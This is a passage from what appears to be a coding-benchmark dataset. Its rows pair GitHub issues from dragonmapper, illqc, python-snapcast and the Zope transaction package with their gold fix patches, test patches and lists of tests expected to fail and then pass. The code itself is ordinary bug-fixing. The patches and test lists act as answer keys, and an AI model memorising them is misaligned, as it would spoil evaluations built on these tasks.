print(printBopomofo(eachLine)+"\n"*3)
File "D:\OneDrive\My Programs\zhuyin converter\Convert2BopomofoPunctuation.py", line 42, in printBopomofo
bopomofoDictionary=makeToneDictionary(hanzistring2)
File "D:\OneDrive\My Programs\zhuyin converter\Convert2BopomofoPunctuation.py", line 35, in makeToneDictionary
bopomofoList=listBopomofo(hanzi)
File "D:\OneDrive\My Programs\zhuyin converter\Convert2BopomofoPunctuation.py", line 11, in listBopomofo
print(transcriptions.pinyin_to_zhuyin(ó))
NameError: name 'ó' is not defined
```
also the following string returns an error
```
(1 4 事情是這樣的 , 父親讀到也看到許多偉大而奇妙的事時 , 他向主高呼許多事 , 諸如 : 哦 , 主神全能者 , 您的事工多麼偉大而奇妙 ! 您的寶座在高天之上 , 您的大能、良善和慈悲廣被世上全民 , 而且 , 由於您的慈悲 , 您不會讓歸向您的人滅亡 ! )
```
```python
>>> pinyin=hanzi.to_zhuyin(hanzistring)
Traceback (most recent call last):
File "C:\Users\Kei\AppData\Local\Programs\Python\Python35\lib\site-packages\dragonmapper\transcriptions.py", line 227, in pinyin_syllable_to_zhuyin
zhuyin_syllable = _PINYIN_MAP[pinyin_syllable.lower()]['Zhuyin']
KeyError: 'o'
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "D:\OneDrive\My Programs\zhuyin converter\Convert2BopomofoPunctuation.py", line 100, in <module>
print(printBopomofo(eachLine)+"\n"*3)
File "D:\OneDrive\My Programs\zhuyin converter\Convert2BopomofoPunctuation.py", line 42, in printBopomofo
bopomofoDictionary=makeToneDictionary(hanzistring2)
File "D:\OneDrive\My Programs\zhuyin converter\Convert2BopomofoPunctuation.py", line 35, in makeToneDictionary
bopomofoList=listBopomofo(hanzi)
File "D:\OneDrive\My Programs\zhuyin converter\Convert2BopomofoPunctuation.py", line 12, in listBopomofo
pinyin=hanzi.to_zhuyin(hanzistring)
File "C:\Users\Kei\AppData\Local\Programs\Python\Python35\lib\site-packages\dragonmapper\hanzi.py", line 190, in to_zhuyin
zhuyin = pinyin_to_zhuyin(numbered_pinyin)
File "C:\Users\Kei\AppData\Local\Programs\Python\Python35\lib\site-packages\dragonmapper\transcriptions.py", line 365, in pinyin_to_zhuyin
remove_apostrophes=True, separate_syllables=True)
File "C:\Users\Kei\AppData\Local\Programs\Python\Python35\lib\site-packages\dragonmapper\transcriptions.py", line 341, in _convert
new += syllable_function(match.group())
File "C:\Users\Kei\AppData\Local\Programs\Python\Python35\lib\site-packages\dragonmapper\transcriptions.py", line 229, in pinyin_syllable_to_zhuyin
raise ValueError('Not a valid syllable: %s' % s)
ValueError: Not a valid syllable: o2
```
|
0.0
|
0f58b30f65718494afb1de9cb25d68d5b3246a0f
|
[
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_issue_23"
] |
[
"dragonmapper/tests/test-transcriptions.py::TestIdentifyFunctions::test_is_zhuyin",
"dragonmapper/tests/test-transcriptions.py::TestIdentifyFunctions::test_is_zhuyin_compatible",
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_drop_apostrophe",
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_handle_middle_dot",
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_ipa_to_pinyin",
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_ipa_to_zhuyin",
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_issue_2",
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_issue_3",
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_issue_4",
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_issue_5",
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_issue_6",
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_issue_8",
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_pinyin_middle_dot",
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_pinyin_r_suffix",
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_pinyin_to_ipa",
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_pinyin_to_zhuyin",
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_zhuyin_to_ipa",
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_zhuyin_to_pinyin"
] |
{
"failed_lite_validators": [],
"has_test_patch": true,
"is_lite": true
}
|
2017-03-21 14:35:28+00:00
|
mit
| 6,102
|
|
PennChopMicrobiomeProgram__illqc-17
|
diff --git a/illqclib/main.py b/illqclib/main.py
index e8503bf..396d282 100644
--- a/illqclib/main.py
+++ b/illqclib/main.py
@@ -67,7 +67,7 @@ class Trimmomatic(object):
"ILLUMINACLIP:%s:2:30:10:8:true" % self._adapter_fp,
"LEADING:%d" % self.config["leading"],
"TRAILING:%d" % self.config["trailing"],
- "SLIDINGWINDOW:%d:%d" % self.config["slidingwindow"],
+ "SLIDINGWINDOW:%d:%d" % tuple(self.config["slidingwindow"]),
"MINLEN:%d" % self.config["minlen"],
]
|
PennChopMicrobiomeProgram/illqc
|
bc504d4c93300db446ab7b70cb0660f682d07687
|
diff --git a/test/test_main.py b/test/test_main.py
index 7a75113..803ed7b 100644
--- a/test/test_main.py
+++ b/test/test_main.py
@@ -26,17 +26,19 @@ class ConfigTests(unittest.TestCase):
class TrimmomaticTests(unittest.TestCase):
+ config_vals = {
+ "trimmomatic_jar_fp": "trimmomatic-0.30.jar",
+ "adapter_dir": "adapters",
+ "adapter": "NexteraPE-PE",
+ "leading": 3,
+ "trailing": 3,
+ "slidingwindow": (4, 15),
+ "minlen": 36,
+ "java_heapsize":"200M"
+ }
+
def test_make_command(self):
- app = Trimmomatic({
- "trimmomatic_jar_fp": "trimmomatic-0.30.jar",
- "adapter_dir": "adapters",
- "adapter": "NexteraPE-PE",
- "leading": 3,
- "trailing": 3,
- "slidingwindow": (4, 15),
- "minlen": 36,
- "java_heapsize":"200M"
- })
+ app = Trimmomatic(self.config_vals)
observed = app.make_command("a.fastq", "b.fastq", "mydir")
expected = [
'java', '-Xmx200M', '-jar', 'trimmomatic-0.30.jar', 'PE', '-phred33',
@@ -47,3 +49,18 @@ class TrimmomaticTests(unittest.TestCase):
'LEADING:3', 'TRAILING:3', 'SLIDINGWINDOW:4:15', 'MINLEN:36',
]
self.assertEqual(observed, expected)
+
+ def test_make_command_sliding_window_as_list(self):
+ config_vals = self.config_vals.copy()
+ config_vals["slidingwindow"] = [6, 32]
+ app = Trimmomatic(config_vals)
+ observed = app.make_command("a.fastq", "b.fastq", "mydir")
+ expected = [
+ 'java', '-Xmx200M', '-jar', 'trimmomatic-0.30.jar', 'PE', '-phred33',
+ 'a.fastq', 'b.fastq',
+ 'mydir/a.fastq', 'mydir/a_unpaired.fastq',
+ 'mydir/b.fastq', 'mydir/b_unpaired.fastq',
+ 'ILLUMINACLIP:adapters/NexteraPE-PE.fa:2:30:10:8:true',
+ 'LEADING:3', 'TRAILING:3', 'SLIDINGWINDOW:6:32', 'MINLEN:36',
+ ]
+ self.assertEqual(observed, expected)
|
Cannot configure setting for sliding window
Python needs a tuple value for this setting, but JSON does not support tuple types. Suggest converting to value tuple before line 70:
https://github.com/PennChopMicrobiomeProgram/illqc/blob/master/illqclib/main.py#L70
|
0.0
|
bc504d4c93300db446ab7b70cb0660f682d07687
|
[
"test/test_main.py::TrimmomaticTests::test_make_command_sliding_window_as_list"
] |
[
"test/test_main.py::TrimmomaticTests::test_make_command"
] |
{
"failed_lite_validators": [
"has_short_problem_statement"
],
"has_test_patch": true,
"is_lite": false
}
|
2017-03-04 12:40:47+00:00
|
mit
| 454
|
|
happyleavesaoc__python-snapcast-64
|
diff --git a/setup.py b/setup.py
index 6c934d0..e2fa579 100644
--- a/setup.py
+++ b/setup.py
@@ -2,7 +2,7 @@ from setuptools import setup
setup(
name='snapcast',
- version='2.3.3',
+ version='2.3.4',
description='Control Snapcast.',
url='https://github.com/happyleavesaoc/python-snapcast/',
license='MIT',
diff --git a/snapcast/control/group.py b/snapcast/control/group.py
index 7935b2f..3b9a8be 100644
--- a/snapcast/control/group.py
+++ b/snapcast/control/group.py
@@ -105,8 +105,10 @@ class Snapgroup():
@property
def friendly_name(self):
"""Get friendly name."""
- return self.name if self.name != '' else "+".join(
- sorted([self._server.client(c).friendly_name for c in self.clients]))
+ fname = self.name if self.name != '' else "+".join(
+ sorted([self._server.client(c).friendly_name for c in self.clients
+ if c in [client.identifier for client in self._server.clients]]))
+ return fname if fname != '' else self.identifier
@property
def clients(self):
diff --git a/snapcast/control/server.py b/snapcast/control/server.py
index e93f5b1..afff4b3 100644
--- a/snapcast/control/server.py
+++ b/snapcast/control/server.py
@@ -284,7 +284,6 @@ class Snapserver():
new_groups[group.get('id')].update(group)
else:
new_groups[group.get('id')] = Snapgroup(self, group)
- _LOGGER.debug('group found: %s', new_groups[group.get('id')])
for client in group.get('clients'):
if client.get('id') in self._clients:
new_clients[client.get('id')] = self._clients[client.get('id')]
@@ -292,6 +291,7 @@ class Snapserver():
else:
new_clients[client.get('id')] = Snapclient(self, client)
_LOGGER.debug('client found: %s', new_clients[client.get('id')])
+ _LOGGER.debug('group found: %s', new_groups[group.get('id')])
self._groups = new_groups
self._clients = new_clients
self._streams = new_streams
@@ -402,14 +402,21 @@ class Snapserver():
def _on_stream_update(self, data):
"""Handle stream update."""
- self._streams[data.get('id')].update(data.get('stream'))
- _LOGGER.debug('stream %s updated', self._streams[data.get('id')].friendly_name)
- self._streams[data.get("id")].callback()
- for group in self._groups.values():
- if group.stream == data.get('id'):
- group.callback()
- for clientID in group.clients:
- self._clients.get(clientID).callback()
+ if data.get('id') in self._streams:
+ self._streams[data.get('id')].update(data.get('stream'))
+ _LOGGER.debug('stream %s updated', self._streams[data.get('id')].friendly_name)
+ self._streams[data.get("id")].callback()
+ for group in self._groups.values():
+ if group.stream == data.get('id'):
+ group.callback()
+ for clientID in group.clients:
+ self._clients.get(clientID).callback()
+ else:
+ if data.get('stream', {}).get('uri', {}).get('query', {}).get('codec') == 'null':
+ _LOGGER.debug('stream %s is input-only, ignore', data.get('id'))
+ else:
+ _LOGGER.info('stream %s not found, synchronize', data.get('id'))
+ self.synchronize(self.status())
def set_on_update_callback(self, func):
"""Set on update callback function."""
|
happyleavesaoc/python-snapcast
|
9c8f97cea23015ab2414e9eee43926eca5878634
|
diff --git a/tests/test_group.py b/tests/test_group.py
index 5c3563b..bd99ec2 100644
--- a/tests/test_group.py
+++ b/tests/test_group.py
@@ -28,21 +28,26 @@ class TestSnapgroup(unittest.TestCase):
client.callback = MagicMock()
client.update_volume = MagicMock()
client.friendly_name = 'A'
+ client.identifier = 'a'
server.streams = [stream]
server.stream = MagicMock(return_value=stream)
server.client = MagicMock(return_value=client)
+ server.clients = [client]
self.group = Snapgroup(server, data)
def test_init(self):
self.assertEqual(self.group.identifier, 'test')
self.assertEqual(self.group.name, '')
- self.assertEqual(self.group.friendly_name, 'A+A')
+ self.assertEqual(self.group.friendly_name, 'A')
self.assertEqual(self.group.stream, 'test stream')
self.assertEqual(self.group.muted, False)
self.assertEqual(self.group.volume, 50)
self.assertEqual(self.group.clients, ['a', 'b'])
self.assertEqual(self.group.stream_status, 'playing')
+ def test_repr(self):
+ self.assertEqual(self.group.__repr__(), 'Snapgroup (A, test)')
+
def test_update(self):
self.group.update({
'stream_id': 'other stream'
|
Exceptions thrown when debug logging is enabled
When logging is configured for DEBUG the following exceptions are thrown upon connecting to my Snapcast server.
```
DEBUG:snapcast.control.server:connected to snapserver on wyseguy:1705
DEBUG:snapcast.control.server:stream found: Snapstream (UPnP)
DEBUG:snapcast.control.server:stream found: Snapstream (Airplay)
DEBUG:snapcast.control.server:stream found: Snapstream (Spotify)
DEBUG:snapcast.control.server:stream found: Snapstream (All Streams)
--- Logging error ---
Traceback (most recent call last):
File "/usr/lib/python3.11/logging/__init__.py", line 1110, in emit
msg = self.format(record)
^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/logging/__init__.py", line 953, in format
return fmt.format(record)
^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/logging/__init__.py", line 687, in format
record.message = record.getMessage()
^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/logging/__init__.py", line 377, in getMessage
msg = msg % self.args
~~~~^~~~~~~~~~~
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/.venv/lib/python3.11/site-packages/snapcast/control/group.py", line 193, in __repr__
return f'Snapgroup ({self.friendly_name}, {self.identifier})'
^^^^^^^^^^^^^^^^^^
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/.venv/lib/python3.11/site-packages/snapcast/control/group.py", line 109, in friendly_name
sorted([self._server.client(c).friendly_name for c in self.clients]))
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/.venv/lib/python3.11/site-packages/snapcast/control/group.py", line 109, in <listcomp>
sorted([self._server.client(c).friendly_name for c in self.clients]))
^^^^^^^^^^^^^^^^^^^^^^
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/.venv/lib/python3.11/site-packages/snapcast/control/server.py", line 251, in client
return self._clients[client_identifier]
~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^
KeyError: 'b8:27:eb:e3:17:de'
Call stack:
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/./error.py", line 18, in <module>
asyncio.run(main())
File "/usr/lib/python3.11/asyncio/runners.py", line 190, in run
return runner.run(main)
File "/usr/lib/python3.11/asyncio/runners.py", line 118, in run
return self._loop.run_until_complete(task)
File "/usr/lib/python3.11/asyncio/base_events.py", line 640, in run_until_complete
self.run_forever()
File "/usr/lib/python3.11/asyncio/base_events.py", line 607, in run_forever
self._run_once()
File "/usr/lib/python3.11/asyncio/base_events.py", line 1922, in _run_once
handle._run()
File "/usr/lib/python3.11/asyncio/events.py", line 80, in _run
self._context.run(self._callback, *self._args)
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/./error.py", line 14, in main
await snapcast.control.create_server(loop, "wyseguy")
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/.venv/lib/python3.11/site-packages/snapcast/control/__init__.py", line 9, in create_server
await server.start()
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/.venv/lib/python3.11/site-packages/snapcast/control/server.py", line 115, in start
self.synchronize(status)
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/.venv/lib/python3.11/site-packages/snapcast/control/server.py", line 287, in synchronize
_LOGGER.debug('group found: %s', new_groups[group.get('id')])
Unable to print the message and arguments - possible formatting error.
Use the traceback above to help find the error.
DEBUG:snapcast.control.server:client found: Snapclient 0.27.0 (StereoBerry, b8:27:eb:e3:17:de)
--- Logging error ---
Traceback (most recent call last):
File "/usr/lib/python3.11/logging/__init__.py", line 1110, in emit
msg = self.format(record)
^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/logging/__init__.py", line 953, in format
return fmt.format(record)
^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/logging/__init__.py", line 687, in format
record.message = record.getMessage()
^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/logging/__init__.py", line 377, in getMessage
msg = msg % self.args
~~~~^~~~~~~~~~~
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/.venv/lib/python3.11/site-packages/snapcast/control/group.py", line 193, in __repr__
return f'Snapgroup ({self.friendly_name}, {self.identifier})'
^^^^^^^^^^^^^^^^^^
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/.venv/lib/python3.11/site-packages/snapcast/control/group.py", line 109, in friendly_name
sorted([self._server.client(c).friendly_name for c in self.clients]))
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/.venv/lib/python3.11/site-packages/snapcast/control/group.py", line 109, in <listcomp>
sorted([self._server.client(c).friendly_name for c in self.clients]))
^^^^^^^^^^^^^^^^^^^^^^
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/.venv/lib/python3.11/site-packages/snapcast/control/server.py", line 251, in client
return self._clients[client_identifier]
~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^
KeyError: 'b8:27:eb:43:7e:9f'
Call stack:
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/./error.py", line 18, in <module>
asyncio.run(main())
File "/usr/lib/python3.11/asyncio/runners.py", line 190, in run
return runner.run(main)
File "/usr/lib/python3.11/asyncio/runners.py", line 118, in run
return self._loop.run_until_complete(task)
File "/usr/lib/python3.11/asyncio/base_events.py", line 640, in run_until_complete
self.run_forever()
File "/usr/lib/python3.11/asyncio/base_events.py", line 607, in run_forever
self._run_once()
File "/usr/lib/python3.11/asyncio/base_events.py", line 1922, in _run_once
handle._run()
File "/usr/lib/python3.11/asyncio/events.py", line 80, in _run
self._context.run(self._callback, *self._args)
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/./error.py", line 14, in main
await snapcast.control.create_server(loop, "wyseguy")
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/.venv/lib/python3.11/site-packages/snapcast/control/__init__.py", line 9, in create_server
await server.start()
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/.venv/lib/python3.11/site-packages/snapcast/control/server.py", line 115, in start
self.synchronize(status)
File "/net/wyseguy/mnt/ssd/projects/snapcast-monitor/.venv/lib/python3.11/site-packages/snapcast/control/server.py", line 287, in synchronize
_LOGGER.debug('group found: %s', new_groups[group.get('id')])
Unable to print the message and arguments - possible formatting error.
Use the traceback above to help find the error.
DEBUG:snapcast.control.server:client found: Snapclient 0.27.0 (NoteBerry, b8:27:eb:43:7e:9f)
DEBUG:snapcast.control.server:Server connected
```
Script to recreate
```python3
#!/usr/bin/env python3
import asyncio
import logging
import snapcast.control
async def main():
logging.basicConfig(level=logging.DEBUG)
# Connect to the Snapcast server
loop = asyncio.get_running_loop()
await snapcast.control.create_server(loop, "wyseguy")
try:
asyncio.run(main())
except KeyboardInterrupt:
pass
```
|
0.0
|
9c8f97cea23015ab2414e9eee43926eca5878634
|
[
"tests/test_group.py::TestSnapgroup::test_init",
"tests/test_group.py::TestSnapgroup::test_repr"
] |
[
"tests/test_group.py::TestSnapgroup::test_add_client",
"tests/test_group.py::TestSnapgroup::test_remove_client",
"tests/test_group.py::TestSnapgroup::test_set_callback",
"tests/test_group.py::TestSnapgroup::test_set_muted",
"tests/test_group.py::TestSnapgroup::test_set_name",
"tests/test_group.py::TestSnapgroup::test_set_stream",
"tests/test_group.py::TestSnapgroup::test_set_volume",
"tests/test_group.py::TestSnapgroup::test_snapshot_restore",
"tests/test_group.py::TestSnapgroup::test_streams_by_name",
"tests/test_group.py::TestSnapgroup::test_update",
"tests/test_group.py::TestSnapgroup::test_update_mute",
"tests/test_group.py::TestSnapgroup::test_update_stream"
] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2024-02-17 17:53:55+00:00
|
mit
| 2,706
|
|
zopefoundation__transaction-28
|
diff --git a/CHANGES.rst b/CHANGES.rst
index 7569466..4a1e878 100644
--- a/CHANGES.rst
+++ b/CHANGES.rst
@@ -1,6 +1,29 @@
Changes
=======
+2.0.0 (unreleased)
+------------------
+
+- The transaction ``user`` and ``description`` attributes are now
+ defined to be text (unicode) as apposed to Python the ``str`` type.
+
+- Added the ``extended_info`` transaction attribute which contains
+ transaction meta data. (The ``_extension`` attribute is retained as
+ an alias for backward compatibility.)
+
+ The transaction interface, ``ITransaction``, now requires
+ ``extended_info`` keys to be text (unicode) and values to be
+ JSON-serializable.
+
+- Removed setUser from ITransaction. We'll keep the method
+ undefinately, but it's unseemly in ITransaction. :)
+
+The main purpose of these changes is to tighten up the text
+specification of user, description and extended_info keys, and to give
+us more flexibility in the future for serializing extended info. It's
+possible that these changes will be breaking, so we're also increasing
+the major version number.
+
1.7.0 (2016-11-08)
------------------
diff --git a/transaction/_transaction.py b/transaction/_transaction.py
index fd4122e..3aa2050 100644
--- a/transaction/_transaction.py
+++ b/transaction/_transaction.py
@@ -76,10 +76,10 @@ class Transaction(object):
# savepoint to its index (see above).
_savepoint2index = None
- # Meta data. ._extension is also metadata, but is initialized to an
+ # Meta data. extended_info is also metadata, but is initialized to an
# emtpy dict in __init__.
- user = ""
- description = ""
+ _user = u""
+ _description = u""
def __init__(self, synchronizers=None, manager=None):
self.status = Status.ACTIVE
@@ -100,9 +100,9 @@ class Transaction(object):
# manager as a key, because we can't guess whether the actual
# resource managers will be safe to use as dict keys.
- # The user, description, and _extension attributes are accessed
+ # The user, description, and extended_info attributes are accessed
# directly by storages, leading underscore notwithstanding.
- self._extension = {}
+ self.extended_info = {}
self.log = _makeLogger()
self.log.debug("new transaction")
@@ -118,6 +118,28 @@ class Transaction(object):
# List of (hook, args, kws) tuples added by addAfterCommitHook().
self._after_commit = []
+ @property
+ def _extension(self):
+ # for backward compatibility, since most clients used this
+ # absent any formal API.
+ return self.extended_info
+
+ @property
+ def user(self):
+ return self._user
+
+ @user.setter
+ def user(self, v):
+ self._user = v + u'' # + u'' to make sure it's unicode
+
+ @property
+ def description(self):
+ return self._description
+
+ @description.setter
+ def description(self, v):
+ self._description = v + u'' # + u'' to make sure it's unicode
+
def isDoomed(self):
""" See ITransaction.
"""
@@ -504,19 +526,19 @@ class Transaction(object):
"""
text = text.strip()
if self.description:
- self.description += "\n" + text
+ self.description += u"\n" + text
else:
self.description = text
def setUser(self, user_name, path="/"):
""" See ITransaction.
"""
- self.user = "%s %s" % (path, user_name)
+ self.user = u"%s %s" % (path, user_name)
def setExtendedInfo(self, name, value):
""" See ITransaction.
"""
- self._extension[name] = value
+ self.extended_info[name + u''] = value # + u'' to make sure it's unicode
# TODO: We need a better name for the adapters.
diff --git a/transaction/interfaces.py b/transaction/interfaces.py
index 52798fa..c7be269 100644
--- a/transaction/interfaces.py
+++ b/transaction/interfaces.py
@@ -105,7 +105,7 @@ class ITransaction(Interface):
"""A user name associated with the transaction.
The format of the user name is defined by the application. The value
- is of Python type str. Storages record the user value, as meta-data,
+ is text (unicode). Storages record the user value, as meta-data,
when a transaction commits.
A storage may impose a limit on the size of the value; behavior is
@@ -116,7 +116,7 @@ class ITransaction(Interface):
description = Attribute(
"""A textual description of the transaction.
- The value is of Python type str. Method note() is the intended
+ The value is text (unicode). Method note() is the intended
way to set the value. Storages record the description, as meta-data,
when a transaction commits.
@@ -125,6 +125,13 @@ class ITransaction(Interface):
raise an exception, or truncate the value).
""")
+ extended_info = Attribute(
+ """A dictionary containing application-defined metadata.
+
+ Keys must be text (unicode). Values must be simple values
+ serializable with json or pickle (not instances).
+ """)
+
def commit():
"""Finalize the transaction.
@@ -167,7 +174,7 @@ class ITransaction(Interface):
"""
def note(text):
- """Add text to the transaction description.
+ """Add text (unicode) to the transaction description.
This modifies the `.description` attribute; see its docs for more
detail. First surrounding whitespace is stripped from `text`. If
@@ -176,21 +183,17 @@ class ITransaction(Interface):
appended to `.description`.
"""
- def setUser(user_name, path="/"):
- """Set the user name.
-
- path should be provided if needed to further qualify the
- identified user. This is a convenience method used by Zope.
- It sets the .user attribute to str(path) + " " + str(user_name).
- This sets the `.user` attribute; see its docs for more detail.
- """
-
def setExtendedInfo(name, value):
"""Add extension data to the transaction.
- name is the name of the extension property to set, of Python type
- str; value must be picklable. Multiple calls may be made to set
- multiple extension properties, provided the names are distinct.
+ name
+ is the text (unicode) name of the extension property to set
+
+ value
+ must be picklable and json serializable (not an instance).
+
+ Multiple calls may be made to set multiple extension
+ properties, provided the names are distinct.
Storages record the extension data, as meta-data, when a transaction
commits.
|
zopefoundation/transaction
|
085ab4fb0521127cd5428db9fd9fdcd3b8eaed10
|
diff --git a/transaction/tests/test__transaction.py b/transaction/tests/test__transaction.py
index 4e63bb3..8fe8c68 100644
--- a/transaction/tests/test__transaction.py
+++ b/transaction/tests/test__transaction.py
@@ -69,14 +69,15 @@ class TransactionTests(unittest.TestCase):
self.assertTrue(isinstance(txn._synchronizers, WeakSet))
self.assertEqual(len(txn._synchronizers), 0)
self.assertTrue(txn._manager is None)
- self.assertEqual(txn.user, "")
- self.assertEqual(txn.description, "")
+ self.assertEqual(txn.user, u"")
+ self.assertEqual(txn.description, u"")
self.assertTrue(txn._savepoint2index is None)
self.assertEqual(txn._savepoint_index, 0)
self.assertEqual(txn._resources, [])
self.assertEqual(txn._adapters, {})
self.assertEqual(txn._voted, {})
- self.assertEqual(txn._extension, {})
+ self.assertEqual(txn.extended_info, {})
+ self.assertTrue(txn._extension is txn.extended_info) # legacy
self.assertTrue(txn.log is logger)
self.assertEqual(len(logger._log), 1)
self.assertEqual(logger._log[0][0], 'debug')
@@ -983,33 +984,45 @@ class TransactionTests(unittest.TestCase):
txn = self._makeOne()
try:
txn.note('This is a note.')
- self.assertEqual(txn.description, 'This is a note.')
+ self.assertEqual(txn.description, u'This is a note.')
txn.note('Another.')
- self.assertEqual(txn.description, 'This is a note.\nAnother.')
+ self.assertEqual(txn.description, u'This is a note.\nAnother.')
finally:
txn.abort()
+ def test_description_nonascii_bytes(self):
+ txn = self._makeOne()
+ with self.assertRaises((UnicodeDecodeError, TypeError)):
+ txn.description = b'\xc2\x80'
+
def test_setUser_default_path(self):
txn = self._makeOne()
txn.setUser('phreddy')
- self.assertEqual(txn.user, '/ phreddy')
+ self.assertEqual(txn.user, u'/ phreddy')
def test_setUser_explicit_path(self):
txn = self._makeOne()
txn.setUser('phreddy', '/bedrock')
- self.assertEqual(txn.user, '/bedrock phreddy')
+ self.assertEqual(txn.user, u'/bedrock phreddy')
+
+ def test_user_nonascii_bytes(self):
+ txn = self._makeOne()
+ with self.assertRaises((UnicodeDecodeError, TypeError)):
+ txn.user = b'\xc2\x80'
def test_setExtendedInfo_single(self):
txn = self._makeOne()
txn.setExtendedInfo('frob', 'qux')
- self.assertEqual(txn._extension, {'frob': 'qux'})
+ self.assertEqual(txn.extended_info, {u'frob': 'qux'})
+ self.assertTrue(txn._extension is txn._extension) # legacy
def test_setExtendedInfo_multiple(self):
txn = self._makeOne()
txn.setExtendedInfo('frob', 'qux')
txn.setExtendedInfo('baz', 'spam')
txn.setExtendedInfo('frob', 'quxxxx')
- self.assertEqual(txn._extension, {'frob': 'quxxxx', 'baz': 'spam'})
+ self.assertEqual(txn._extension, {u'frob': 'quxxxx', u'baz': 'spam'})
+ self.assertTrue(txn._extension is txn._extension) # legacy
def test_data(self):
txn = self._makeOne()
|
Define transaction description and user to be unicode
See:
https://groups.google.com/forum/#!topic/python-transaction/Yn326XwCZ5E
|
0.0
|
085ab4fb0521127cd5428db9fd9fdcd3b8eaed10
|
[
"transaction/tests/test__transaction.py::TransactionTests::test_ctor_defaults",
"transaction/tests/test__transaction.py::TransactionTests::test_description_nonascii_bytes",
"transaction/tests/test__transaction.py::TransactionTests::test_setExtendedInfo_single",
"transaction/tests/test__transaction.py::TransactionTests::test_user_nonascii_bytes"
] |
[
"transaction/tests/test__transaction.py::TransactionTests::test__commitResources_error_in_afterCompletion",
"transaction/tests/test__transaction.py::TransactionTests::test__commitResources_error_in_commit",
"transaction/tests/test__transaction.py::TransactionTests::test__commitResources_error_in_tpc_begin",
"transaction/tests/test__transaction.py::TransactionTests::test__commitResources_error_in_tpc_finish",
"transaction/tests/test__transaction.py::TransactionTests::test__commitResources_error_in_tpc_vote",
"transaction/tests/test__transaction.py::TransactionTests::test__commitResources_normal",
"transaction/tests/test__transaction.py::TransactionTests::test__invalidate_all_savepoints",
"transaction/tests/test__transaction.py::TransactionTests::test__prior_operation_failed",
"transaction/tests/test__transaction.py::TransactionTests::test__remove_and_invalidate_after_hit",
"transaction/tests/test__transaction.py::TransactionTests::test__remove_and_invalidate_after_miss",
"transaction/tests/test__transaction.py::TransactionTests::test__unjoin_hit",
"transaction/tests/test__transaction.py::TransactionTests::test__unjoin_miss",
"transaction/tests/test__transaction.py::TransactionTests::test_abort_clears_resources",
"transaction/tests/test__transaction.py::TransactionTests::test_abort_error_w_afterCompleteHooks",
"transaction/tests/test__transaction.py::TransactionTests::test_abort_error_w_synchronizers",
"transaction/tests/test__transaction.py::TransactionTests::test_abort_w_afterCommitHooks",
"transaction/tests/test__transaction.py::TransactionTests::test_abort_w_beforeCommitHooks",
"transaction/tests/test__transaction.py::TransactionTests::test_abort_w_savepoints",
"transaction/tests/test__transaction.py::TransactionTests::test_abort_w_synchronizers",
"transaction/tests/test__transaction.py::TransactionTests::test_abort_wo_savepoints_wo_hooks_wo_synchronizers",
"transaction/tests/test__transaction.py::TransactionTests::test_addAfterCommitHook",
"transaction/tests/test__transaction.py::TransactionTests::test_addAfterCommitHook_wo_kws",
"transaction/tests/test__transaction.py::TransactionTests::test_addBeforeCommitHook",
"transaction/tests/test__transaction.py::TransactionTests::test_addBeforeCommitHook_w_kws",
"transaction/tests/test__transaction.py::TransactionTests::test_callAfterCommitHook_w_abort",
"transaction/tests/test__transaction.py::TransactionTests::test_callAfterCommitHook_w_error",
"transaction/tests/test__transaction.py::TransactionTests::test_commit_COMMITFAILED",
"transaction/tests/test__transaction.py::TransactionTests::test_commit_DOOMED",
"transaction/tests/test__transaction.py::TransactionTests::test_commit_clears_resources",
"transaction/tests/test__transaction.py::TransactionTests::test_commit_error_w_afterCompleteHooks",
"transaction/tests/test__transaction.py::TransactionTests::test_commit_error_w_synchronizers",
"transaction/tests/test__transaction.py::TransactionTests::test_commit_w_afterCommitHooks",
